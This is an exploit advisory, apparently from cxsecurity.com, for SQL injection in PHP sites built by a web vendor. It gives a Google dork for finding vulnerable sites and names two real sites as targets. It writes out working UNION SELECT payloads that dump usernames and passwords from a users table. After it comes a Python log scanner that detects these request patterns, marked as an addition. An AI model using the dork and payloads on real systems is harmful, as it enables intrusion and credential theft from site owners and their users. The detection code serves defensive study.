79Xperts SQL Injection Vulnerability

2017.05.07
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: 79Xperts SQL Injection Vulnerability
# Google Dork: intext:"Developed by 79Xperts" inurl:.php?id=
# Date: 2017-05-06
# Exploit Author: Sh4dow (Bl4ckDays@Gmail.Com)
# My Team: Zero Security Group
# Vendor Homepage: https://www.79xperts.com
# Tested on: Kali Linux
---------------------------------------------------------------------------------------
Demo:
http://afco.com.sa/products.php?cid=12'
http://iurc.edu.pk/photos.php?id=5'

Example:
http://127.0.0.1/index.php?id=-1'+1,2,Group_Concat(user_name,0x3a,password),3+from+users--+

Demo Injection:
http://afco.com.sa/products.php?cid=-12%27+UNION+ALL+SELECT+1,2,3,4,5,Group_Concat(user_name,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users--+&sid=32&ssid=0
http://iurc.edu.pk/photos.php?id=-5%27+UNION+SELECT+1,Group_Concat(user_name,0x3a,password),3+From+users--+
----------------------------------------------------------------------------------------
# Greetz : My PC
# We Are: Sh4dow - Ghostman - SOLTAN SILENT - R3dC4t And All Member
# Iranian Underground Researchers
# https://telegram.me/ZeroSecOfficial
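A defender-side check for the request patterns shown in this advisory, as an added example that is not part of the original submission: it scans web access logs for `id`/`cid` parameters that carry a quote or a UNION SELECT instead of a plain integer. The log lines are constructed, and the parameter set, function names and finding labels are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: the parameters the advisory shows being injected hold numeric record IDs.
NUMERIC_PARAMS = {"id", "cid"}
UNION_RE = re.compile(r"union\s+(all\s+)?select", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP ranges, no real hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [06/May/2017:10:01:02 +0000] "GET /products.php?cid=12&sid=32&ssid=0 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/May/2017:10:01:09 +0000] "GET /products.php?cid=12%27 HTTP/1.1" 200 310',
    '203.0.113.9 - - [06/May/2017:10:01:30 +0000] "GET /photos.php?id=-5%27+UNION+SELECT+1,Group_Concat(user_name,0x3a,password),3+From+users--+ HTTP/1.1" 200 2048',
    '198.51.100.4 - - [06/May/2017:10:02:00 +0000] "GET /photos.php?id=5 HTTP/1.1" 200 4096',
]

def classify(value):
    """Return None for a clean numeric ID, otherwise a finding label."""
    if re.fullmatch(r"\d+", value):
        return None
    if UNION_RE.search(value):
        return "union-select"
    if "'" in value or '"' in value:
        return "quote-probe"
    return "non-numeric"

def scan(lines):
    """Return (client_ip, path, param, label) for each suspicious numeric parameter."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        # parse_qsl decodes %27 and '+', so URL-encoded payloads are matched too.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            label = classify(value) if name.lower() in NUMERIC_PARAMS else None
            if label:
                findings.append((line.split()[0], url.path, name, label))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

A hit on a numeric parameter is a triage signal, not proof of compromise; the fix on the application side remains integer validation plus parameterized queries.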



Copyright 2017, cxsecurity.com

 
